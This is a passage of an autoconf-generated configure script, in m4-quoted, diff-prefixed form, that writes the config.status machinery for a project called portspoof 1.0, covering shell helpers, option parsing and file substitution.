as_fn_append VAR VALUE +@%:@ ---------------------- +@%:@ Append the text in VALUE to the end of the definition contained in VAR. Take +@%:@ advantage of any shell optimizations that allow amortized linear growth over +@%:@ repeated appends, instead of the typical quadratic growth present in naive +@%:@ implementations. +if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null; then : + eval 'as_fn_append () + { + eval $1+=\$2 + }' +else + as_fn_append () + { + eval $1=\$$1\$2 + } +fi # as_fn_append + +@%:@ as_fn_arith ARG... +@%:@ ------------------ +@%:@ Perform arithmetic evaluation on the ARGs, and store the result in the +@%:@ global @S|@as_val. Take advantage of shells that can avoid forks. The arguments +@%:@ must be portable across @S|@(()) and expr. +if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null; then : + eval 'as_fn_arith () + { + as_val=$(( $* )) + }' +else + as_fn_arith () + { + as_val=`expr "$@" || test $? -eq 1` + } +fi # as_fn_arith + + +if expr a : '\(a\)' >/dev/null 2>&1 && + test "X`expr 00001 : '.*\(...\)'`" = X001; then + as_expr=expr +else + as_expr=false +fi + +if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then + as_basename=basename +else + as_basename=false +fi + +if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then + as_dirname=dirname +else + as_dirname=false +fi + +as_me=`$as_basename -- "$0" || +$as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ + X"$0" : 'X\(//\)$' \| \ + X"$0" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X/"$0" | + sed '/^.*\/\([^/][^/]*\)\/*$/{ + s//\1/ + q + } + /^X\/\(\/\/\)$/{ + s//\1/ + q + } + /^X\/\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + +# Avoid depending upon Character Ranges. +as_cr_letters='abcdefghijklmnopqrstuvwxyz' +as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' +as_cr_Letters=$as_cr_letters$as_cr_LETTERS +as_cr_digits='0123456789' +as_cr_alnum=$as_cr_Letters$as_cr_digits + +ECHO_C= ECHO_N= ECHO_T= +case `echo -n x` in @%:@((((( +-n*) + case `echo 'xy\c'` in + *c*) ECHO_T=' ';; # ECHO_T is single tab character. + xy) ECHO_C='\c';; + *) echo `echo ksh88 bug on AIX 6.1` > /dev/null + ECHO_T=' ';; + esac;; +*) + ECHO_N='-n';; +esac + +rm -f conf$$ conf$$.exe conf$$.file +if test -d conf$$.dir; then + rm -f conf$$.dir/conf$$.file +else + rm -f conf$$.dir + mkdir conf$$.dir 2>/dev/null +fi +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else + as_ln_s='cp -p' + fi +else + as_ln_s='cp -p' +fi +rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file +rmdir conf$$.dir 2>/dev/null + + +@%:@ as_fn_mkdir_p +@%:@ ------------- +@%:@ Create "@S|@as_dir" as a directory, including parents if necessary. +as_fn_mkdir_p () +{ + + case $as_dir in #( + -*) as_dir=./$as_dir;; + esac + test -d "$as_dir" || eval $as_mkdir_p || { + as_dirs= + while :; do + case $as_dir in #( + *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( + *) as_qdir=$as_dir;; + esac + as_dirs="'$as_qdir' $as_dirs" + as_dir=`$as_dirname -- "$as_dir" || +$as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_dir" : 'X\(//\)[^/]' \| \ + X"$as_dir" : 'X\(//\)$' \| \ + X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_dir" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + test -d "$as_dir" && break + done + test -z "$as_dirs" || eval "mkdir $as_dirs" + } || test -d "$as_dir" || as_fn_error "cannot create directory $as_dir" + + +} @%:@ as_fn_mkdir_p +if mkdir -p . 2>/dev/null; then + as_mkdir_p='mkdir -p "$as_dir"' +else + test -d ./-p && rmdir ./-p + as_mkdir_p=false +fi + +if test -x / >/dev/null 2>&1; then + as_test_x='test -x' +else + if ls -dL / >/dev/null 2>&1; then + as_ls_L_option=L + else + as_ls_L_option= + fi + as_test_x=' + eval sh -c '\'' + if test -d "$1"; then + test -d "$1/."; + else + case $1 in @%:@( + -*)set "./$1";; + esac; + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in @%:@(( + ???[sx]*):;;*)false;;esac;fi + '\'' sh + ' +fi +as_executable_p=$as_test_x + +# Sed expression to map a string onto a valid CPP name. +as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" + +# Sed expression to map a string onto a valid variable name. +as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" + + +exec 6>&1 +## ----------------------------------- ## +## Main body of $CONFIG_STATUS script. ## +## ----------------------------------- ## +_ASEOF +test $as_write_fail = 0 && chmod +x $CONFIG_STATUS || ac_write_fail=1 + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# Save the log message, to keep $0 and so on meaningful, and to +# report actual input values of CONFIG_FILES etc. instead of their +# values after options handling. +ac_log=" +This file was extended by portspoof $as_me 1.0, which was +generated by GNU Autoconf 2.65. Invocation command line was + + CONFIG_FILES = $CONFIG_FILES + CONFIG_HEADERS = $CONFIG_HEADERS + CONFIG_LINKS = $CONFIG_LINKS + CONFIG_COMMANDS = $CONFIG_COMMANDS + $ $0 $@ + +on `(hostname || uname -n) 2>/dev/null | sed 1q` +" + +_ACEOF + +case $ac_config_files in *" +"*) set x $ac_config_files; shift; ac_config_files=$*;; +esac + +case $ac_config_headers in *" +"*) set x $ac_config_headers; shift; ac_config_headers=$*;; +esac + + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +# Files that config.status was made for. +config_files="$ac_config_files" +config_headers="$ac_config_headers" +config_commands="$ac_config_commands" + +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +ac_cs_usage="\ +\`$as_me' instantiates files and other configuration actions +from templates according to the current configuration. Unless the files +and actions are specified as TAGs, all are instantiated by default. + +Usage: $0 [OPTION]... [TAG]... + + -h, --help print this help, then exit + -V, --version print version number and configuration settings, then exit + --config print configuration, then exit + -q, --quiet, --silent + do not print progress messages + -d, --debug don't remove temporary files + --recheck update $as_me by reconfiguring in the same conditions + --file=FILE[:TEMPLATE] + instantiate the configuration file FILE + --header=FILE[:TEMPLATE] + instantiate the configuration header FILE + +Configuration files: +$config_files + +Configuration headers: +$config_headers + +Configuration commands: +$config_commands + +Report bugs to ." + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" +ac_cs_version="\\ +portspoof config.status 1.0 +configured by $0, generated by GNU Autoconf 2.65, + with options \\"\$ac_cs_config\\" + +Copyright (C) 2009 Free Software Foundation, Inc. +This config.status script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it." + +ac_pwd='$ac_pwd' +srcdir='$srcdir' +INSTALL='$INSTALL' +MKDIR_P='$MKDIR_P' +AWK='$AWK' +test -n "\$AWK" || AWK=awk +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# The default lists apply if the user does not specify any file. +ac_need_defaults=: +while test $# != 0 +do + case $1 in + --*=*) + ac_option=`expr "X$1" : 'X\([^=]*\)='` + ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'` + ac_shift=: + ;; + *) + ac_option=$1 + ac_optarg=$2 + ac_shift=shift + ;; + esac + + case $ac_option in + # Handling of the options. + -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) + ac_cs_recheck=: ;; + --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) + $as_echo "$ac_cs_version"; exit ;; + --config | --confi | --conf | --con | --co | --c ) + $as_echo "$ac_cs_config"; exit ;; + --debug | --debu | --deb | --de | --d | -d ) + debug=: ;; + --file | --fil | --fi | --f ) + $ac_shift + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_FILES " '$ac_optarg'" + ac_need_defaults=false;; + --header | --heade | --head | --hea ) + $ac_shift + case $ac_optarg in + *\'*) ac_optarg=`$as_echo "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; + esac + as_fn_append CONFIG_HEADERS " '$ac_optarg'" + ac_need_defaults=false;; + --he | --h) + # Conflict between --help and --header + as_fn_error "ambiguous option: \`$1' +Try \`$0 --help' for more information.";; + --help | --hel | -h ) + $as_echo "$ac_cs_usage"; exit ;; + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil | --si | --s) + ac_cs_silent=: ;; + + # This is an error. + -*) as_fn_error "unrecognized option: \`$1' +Try \`$0 --help' for more information." ;; + + *) as_fn_append ac_config_targets " $1" + ac_need_defaults=false ;; + + esac + shift +done + +ac_configure_extra_args= + +if $ac_cs_silent; then + exec 6>/dev/null + ac_configure_extra_args="$ac_configure_extra_args --silent" +fi + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +if \$ac_cs_recheck; then + set X '$SHELL' '$0' $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion + shift + \$as_echo "running CONFIG_SHELL=$SHELL \$*" >&6 + CONFIG_SHELL='$SHELL' + export CONFIG_SHELL + exec "\$@" +fi + +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +exec 5>>config.log +{ + echo + sed 'h;s/./-/g;s/^.../@%:@@%:@ /;s/...$/ @%:@@%:@/;p;x;p;x' <<_ASBOX +@%:@@%:@ Running $as_me. @%:@@%:@ +_ASBOX + $as_echo "$ac_log" +} >&5 + +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +# +# INIT-COMMANDS +# +AMDEP_TRUE="$AMDEP_TRUE" ac_aux_dir="$ac_aux_dir" + +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 + +# Handling of arguments. +for ac_config_target in $ac_config_targets +do + case $ac_config_target in + "src/config.h") CONFIG_HEADERS="$CONFIG_HEADERS src/config.h" ;; + "depfiles") CONFIG_COMMANDS="$CONFIG_COMMANDS depfiles" ;; + "Makefile") CONFIG_FILES="$CONFIG_FILES Makefile" ;; + "src/Makefile") CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; + "tools/Makefile") CONFIG_FILES="$CONFIG_FILES tools/Makefile" ;; + + *) as_fn_error "invalid argument: \`$ac_config_target'" "$LINENO" 5;; + esac +done + + +# If the user did not use the arguments to specify the items to instantiate, +# then the envvar interface is used. Set only those that are not. +# We use the long form for the default assignment because of an extremely +# bizarre bug on SunOS 4.1.3. +if $ac_need_defaults; then + test "${CONFIG_FILES+set}" = set || CONFIG_FILES=$config_files + test "${CONFIG_HEADERS+set}" = set || CONFIG_HEADERS=$config_headers + test "${CONFIG_COMMANDS+set}" = set || CONFIG_COMMANDS=$config_commands +fi + +# Have a temporary directory for convenience. Make it in the build tree +# simply because there is no reason against having it here, and in addition, +# creating and moving files from /tmp can sometimes cause problems. +# Hook for its removal unless debugging. +# Note that there is a small window in which the directory will not be cleaned: +# after its creation but before its name has been assigned to `$tmp'. +$debug || +{ + tmp= + trap 'exit_status=$? + { test -z "$tmp" || test ! -d "$tmp" || rm -fr "$tmp"; } && exit $exit_status +' 0 + trap 'as_fn_exit 1' 1 2 13 15 +} +# Create a (secure) tmp directory for tmp files. + +{ + tmp=`(umask 077 && mktemp -d "./confXXXXXX") 2>/dev/null` && + test -n "$tmp" && test -d "$tmp" +} || +{ + tmp=./conf$$-$RANDOM + (umask 077 && mkdir "$tmp") +} || as_fn_error "cannot create a temporary directory in ." "$LINENO" 5 + +# Set up the scripts for CONFIG_FILES section. +# No need to generate them if there are no CONFIG_FILES. +# This happens for instance with `./config.status config.h'. +if test -n "$CONFIG_FILES"; then + + +ac_cr=`echo X | tr X '\015'` +# On cygwin, bash can eat \r inside `` if the user requested igncr. +# But we know of no other shell where ac_cr would be empty at this +# point, so we can use a bashism as a fallback. +if test "x$ac_cr" = x; then + eval ac_cr=\$\'\\r\' +fi +ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' /dev/null` +if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then + ac_cs_awk_cr='\r' +else + ac_cs_awk_cr=$ac_cr +fi + +echo 'BEGIN {' >"$tmp/subs1.awk" && +_ACEOF + + +{ + echo "cat >conf$$subs.awk <<_ACEOF" && + echo "$ac_subst_vars" | sed 's/.*/&!$&$ac_delim/' && + echo "_ACEOF" +} >conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 +ac_delim_num=`echo "$ac_subst_vars" | grep -c '$'` +ac_delim='%!_!# ' +for ac_last_try in false false false false false :; do + . ./conf$$subs.sh || + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 + + ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X` + if test $ac_delim_n = $ac_delim_num; then + break + elif $ac_last_try; then + as_fn_error "could not make $CONFIG_STATUS" "$LINENO" 5 + else + ac_delim="$ac_delim!$ac_delim _$ac_delim!! " + fi +done +rm -f conf$$subs.sh + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +cat >>"\$tmp/subs1.awk" <<\\_ACAWK && +_ACEOF +sed -n ' +h +s/^/S["/; s/!.*/"]=/ +p +g +s/^[^!]*!// +:repl +t repl +s/'"$ac_delim"'$// +t delim +:nl +h +s/\(.\{148\}\)..*/\1/ +t more1 +s/["\\]/\\&/g; s/^/"/; s/$/\\n"\\/ +p +n +b repl +:more1 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t nl +:delim +h +s/\(.\{148\}\)..*/\1/ +t more2 +s/["\\]/\\&/g; s/^/"/; s/$/"/ +p +b +:more2 +s/["\\]/\\&/g; s/^/"/; s/$/"\\/ +p +g +s/.\{148\}// +t delim +' >$CONFIG_STATUS || ac_write_fail=1 +rm -f conf$$subs.awk +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +_ACAWK +cat >>"\$tmp/subs1.awk" <<_ACAWK && + for (key in S) S_is_set[key] = 1 + FS = "" + +} +{ + line = $ 0 + nfields = split(line, field, "@") + substed = 0 + len = length(field[1]) + for (i = 2; i < nfields; i++) { + key = field[i] + keylen = length(key) + if (S_is_set[key]) { + value = S[key] + line = substr(line, 1, len) "" value "" substr(line, len + keylen + 3) + len += length(value) + length(field[++i]) + substed = 1 + } else + len += 1 + keylen + } + + print line +} + +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +if sed "s/$ac_cr//" < /dev/null > /dev/null 2>&1; then + sed "s/$ac_cr\$//; s/$ac_cr/$ac_cs_awk_cr/g" +else + cat +fi < "$tmp/subs1.awk" > "$tmp/subs.awk" \ + || as_fn_error "could not setup config files machinery" "$LINENO" 5 +_ACEOF + +# VPATH may cause trouble with some makes, so we remove $(srcdir), +# ${srcdir} and @srcdir@ from VPATH if srcdir is ".", strip leading and +# trailing colons and then remove the whole line if VPATH becomes empty +# (actually we leave an empty line to preserve line numbers). +if test "x$srcdir" = x.; then + ac_vpsub='/^[ ]*VPATH[ ]*=/{ +s/:*\$(srcdir):*/:/ +s/:*\${srcdir}:*/:/ +s/:*@srcdir@:*/:/ +s/^\([^=]*=[ ]*\):*/\1/ +s/:*$// +s/^[^=]*=[ ]*$// +}' +fi + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +fi # test -n "$CONFIG_FILES" + +# Set up the scripts for CONFIG_HEADERS section. +# No need to generate them if there are no CONFIG_HEADERS. +# This happens for instance with `./config.status Makefile'. +if test -n "$CONFIG_HEADERS"; then +cat >"$tmp/defines.awk" <<\_ACAWK || +BEGIN { +_ACEOF + +# Transform confdefs.h into an awk script `defines.awk', embedded as +# here-document in config.status, that substitutes the proper values into +# config.h.in to produce config.h. + +# Create a delimiter string that does not exist in confdefs.h, to ease +# handling of long lines. +ac_delim='%!_!# ' +for ac_last_try in false false :; do + ac_t=`sed -n "/$ac_delim/p" confdefs.h` + if test -z "$ac_t"; then + break + elif $ac_last_try; then + as_fn_error "could not make $CONFIG_HEADERS" "$LINENO" 5 + else + ac_delim="$ac_delim!$ac_delim _$ac_delim!! " + fi +done + +# For the awk script, D is an array of macro values keyed by name, +# likewise P contains macro parameters if any. Preserve backslash +# newline sequences. + +ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* +sed -n ' +s/.\{148\}/&'"$ac_delim"'/g +t rset +:rset +s/^[ ]*#[ ]*define[ ][ ]*/ / +t def +d +:def +s/\\$// +t bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3"/p +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2"/p +d +:bsnl +s/["\\]/\\&/g +s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ +D["\1"]=" \3\\\\\\n"\\/p +t cont +s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2\\\\\\n"\\/p +t cont +d +:cont +n +s/.\{148\}/&'"$ac_delim"'/g +t clear +:clear +s/\\$// +t bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/"/p +d +:bsnlc +s/["\\]/\\&/g; s/^/"/; s/$/\\\\\\n"\\/p +b cont +' >$CONFIG_STATUS || ac_write_fail=1 + +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 + for (key in D) D_is_set[key] = 1 + FS = "" +} +/^[\t ]*#[\t ]*(define|undef)[\t ]+$ac_word_re([\t (]|\$)/ { + line = \$ 0 + split(line, arg, " ") + if (arg[1] == "#") { + defundef = arg[2] + mac1 = arg[3] + } else { + defundef = substr(arg[1], 2) + mac1 = arg[2] + } + split(mac1, mac2, "(") #) + macro = mac2[1] + prefix = substr(line, 1, index(line, defundef) - 1) + if (D_is_set[macro]) { + # Preserve the white space surrounding the "#". + print prefix "define", macro P[macro] D[macro] + next + } else { + # Replace #undef with comments. This is necessary, for example, + # in the case of _POSIX_SOURCE, which is predefined and required + # on some systems where configure will not decide to define it. + if (defundef == "undef") { + print "/*", prefix defundef, macro, "*/" + next + } + } +} +{ print } +_ACAWK +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 + as_fn_error "could not setup config headers machinery" "$LINENO" 5 +fi # test -n "$CONFIG_HEADERS" + + +eval set X " :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS" +shift +for ac_tag +do + case $ac_tag in + :[FHLC]) ac_mode=$ac_tag; continue;; + esac + case $ac_mode$ac_tag in + :[FHL]*:*);; + :L* | :C*:*) as_fn_error "invalid tag \`$ac_tag'" "$LINENO" 5;; + :[FH]-) ac_tag=-:-;; + :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; + esac + ac_save_IFS=$IFS + IFS=: + set x $ac_tag + IFS=$ac_save_IFS + shift + ac_file=$1 + shift + + case $ac_mode in + :L) ac_source=$1;; + :[FH]) + ac_file_inputs= + for ac_f + do + case $ac_f in + -) ac_f="$tmp/stdin";; + *) # Look for the file first in the build tree, then in the source tree + # (if the path is not absolute). The absolute path cannot be DOS-style, + # because $ac_f cannot contain `:'. + test -f "$ac_f" || + case $ac_f in + [\\/$]*) false;; + *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; + esac || + as_fn_error "cannot find input file: \`$ac_f'" "$LINENO" 5;; + esac + case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac + as_fn_append ac_file_inputs " '$ac_f'" + done + + # Let's still pretend it is `configure' which instantiates (i.e., don't + # use $as_me), people would be surprised to read: + # /* config.h. Generated by config.status. */ + configure_input='Generated from '` + $as_echo "$*" | sed 's|^[^:]*/||;s|:[^:]*/|, |g' + `' by configure.' + if test x"$ac_file" != x-; then + configure_input="$ac_file. $configure_input" + { $as_echo "$as_me:${as_lineno-$LINENO}: creating $ac_file" >&5 +$as_echo "$as_me: creating $ac_file" >&6;} + fi + # Neutralize special characters interpreted by sed in replacement strings. + case $configure_input in #( + *\&* | *\|* | *\\* ) + ac_sed_conf_input=`$as_echo "$configure_input" | + sed 's/[\\\\&|]/\\\\&/g'`;; #( + *) ac_sed_conf_input=$configure_input;; + esac + + case $ac_tag in + *:-:* | *:-) cat >"$tmp/stdin" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 ;; + esac + ;; + esac + + ac_dir=`$as_dirname -- "$ac_file" || +$as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$ac_file" : 'X\(//\)[^/]' \| \ + X"$ac_file" : 'X\(//\)$' \| \ + X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$ac_file" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + as_dir="$ac_dir"; as_fn_mkdir_p + ac_builddir=. + +case "$ac_dir" in +.) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; +*) + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` + # A ".." for each directory in $ac_dir_suffix. + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` + case $ac_top_builddir_sub in + "") ac_top_builddir_sub=. ac_top_build_prefix= ;; + *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; + esac ;; +esac +ac_abs_top_builddir=$ac_pwd +ac_abs_builddir=$ac_pwd$ac_dir_suffix +# for backward compatibility: +ac_top_builddir=$ac_top_build_prefix + +case $srcdir in + .) # We are building in place. + ac_srcdir=. + ac_top_srcdir=$ac_top_builddir_sub + ac_abs_top_srcdir=$ac_pwd ;; + [\\/]* | ?:[\\/]* ) # Absolute name. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir + ac_abs_top_srcdir=$srcdir ;; + *) # Relative name. + ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_build_prefix$srcdir + ac_abs_top_srcdir=$ac_pwd/$srcdir ;; +esac +ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix + + + case $ac_mode in + :F) + # + # CONFIG_FILE + # + + case $INSTALL in + [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; + *) ac_INSTALL=$ac_top_build_prefix$INSTALL ;; + esac + ac_MKDIR_P=$MKDIR_P + case $MKDIR_P in + [\\/$]* | ?:[\\/]* ) ;; + */*) ac_MKDIR_P=$ac_top_build_prefix$MKDIR_P ;; + esac +_ACEOF + +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +# If the template does not know about datarootdir, expand it. +# FIXME: This hack should be removed a few years after 2.60. +ac_datarootdir_hack=; ac_datarootdir_seen= +ac_sed_dataroot=' +/datarootdir/ { + p + q +} +/@datadir@/p +/@docdir@/p +/@infodir@/p +/@localedir@/p +/@mandir@/p' +case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in +*datarootdir*) ac_datarootdir_seen=yes;; +*@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 +$as_echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} +_ACEOF +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 + ac_datarootdir_hack=' + s&@datadir@&$datadir&g + s&@docdir@&$docdir&g + s&@infodir@&$infodir&g + s&@localedir@&$localedir&g + s&@mandir@&$mandir&g + s&\\\${datarootdir}&$datarootdir&g' ;; +esac +_ACEOF + +# Neutralize VPATH when `$srcdir' = `.'. +# Shell code in configure.ac might set extrasub. +# FIXME: do we really want to maintain this feature? +cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 +ac_sed_extra="$ac_vpsub +$extrasub +_ACEOF +cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 +:t +/@[a-zA-Z_][a-zA-Z_0-9]*@/!b +s|@configure_input@|$ac_sed_conf_input|;t t +s&@top_builddir@&$ac_top_builddir_sub&;t t +s&@top_build_prefix@&$ac_top_build_prefix&;t t +s&@srcdir@&$ac_srcdir&;t t +s&@abs_srcdir@&$ac_abs_srcdir&;t t +s&@top_srcdir@&$ac_top_srcdir&;t t +s&@abs_top_srcdir@&$ac_abs_top_srcdir&;t t +s&@builddir@&$ac_builddir&;t t +s&@abs_builddir@&$ac_abs_builddir&;t t +s&@abs_top_builddir@&$ac_abs_top_builddir&;t t +s&@INSTALL@&$ac_INSTALL&;t t +s&@MKDIR_P@&$ac_MKDIR_P&;t t +$ac_datarootdir_hack +" +eval sed \"\$ac_sed_extra\" "$ac_file_inputs" | $AWK -f "$tmp/subs.awk" >$tmp/out \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + +test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && + { ac_out=`sed -n '/\${datarootdir}/p' "$tmp/out"`; test -n "$ac_out"; } && + { ac_out=`sed -n '/^[ ]*datarootdir[ ]*:*=/p' "$tmp/out"`; test -z "$ac_out"; } && + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file contains a reference to the variable \`datarootdir' +which seems to be undefined. Please make sure it is defined." >&5 +$as_echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' +which seems to be undefined. Please make sure it is defined." >&2;} + + rm -f "$tmp/stdin" + case $ac_file in + -) cat "$tmp/out" && rm -f "$tmp/out";; + *) rm -f "$ac_file" && mv "$tmp/out" "$ac_file";; + esac \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + ;; + :H) + # + # CONFIG_HEADER + # + if test x"$ac_file" != x-; then + { + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" + } >"$tmp/config.h" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + if diff "$ac_file" "$tmp/config.h" >/dev/null 2>&1; then + { $as_echo "$as_me:${as_lineno-$LINENO}: $ac_file is unchanged" >&5 +$as_echo "$as_me: $ac_file is unchanged" >&6;} + else + rm -f "$ac_file" + mv "$tmp/config.h" "$ac_file" \ + || as_fn_error "could not create $ac_file" "$LINENO" 5 + fi + else + $as_echo "/* $configure_input */" \ + && eval '$AWK -f "$tmp/defines.awk"' "$ac_file_inputs" \ + || as_fn_error "could not create -" "$LINENO" 5 + fi +# Compute "$ac_file"'s index in $config_headers. +_am_arg="$ac_file" +_am_stamp_count=1 +for _am_header in $config_headers :; do + case $_am_header in + $_am_arg | $_am_arg:* ) + break ;; + * ) + _am_stamp_count=`expr $_am_stamp_count + 1` ;; + esac +done +echo "timestamp for $_am_arg" >`$as_dirname -- "$_am_arg" || +$as_expr X"$_am_arg" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$_am_arg" : 'X\(//\)[^/]' \| \ + X"$_am_arg" : 'X\(//\)$' \| \ + X"$_am_arg" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$_am_arg" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'`/stamp-h$_am_stamp_count + ;; + + :C) { $as_echo "$as_me:${as_lineno-$LINENO}: executing $ac_file commands" >&5 +$as_echo "$as_me: executing $ac_file commands" >&6;} + ;; + esac + + + case $ac_file$ac_mode in + "depfiles":C) test x"$AMDEP_TRUE" != x"" || { + # Autoconf 2.62 quotes --file arguments for eval, but not when files + # are listed without --file. Let's play safe and only enable the eval + # if we detect the quoting. + case $CONFIG_FILES in + *\'*) eval set x "$CONFIG_FILES" ;; + *) set x $CONFIG_FILES ;; + esac + shift + for mf + do + # Strip MF so we end up with the name of the file. + mf=`echo "$mf" | sed -e 's/:.*$//'` + # Check whether this is an Automake generated Makefile or not. + # We used to match only the files named `Makefile.in', but + # some people rename them; so instead we look at the file content. + # Grep'ing the first line is not enough: some people post-process + # each Makefile.in and add a new line on top of each file to say so. + # Grep'ing the whole file is not good either: AIX grep has a line + # limit of 2048, but all sed's we 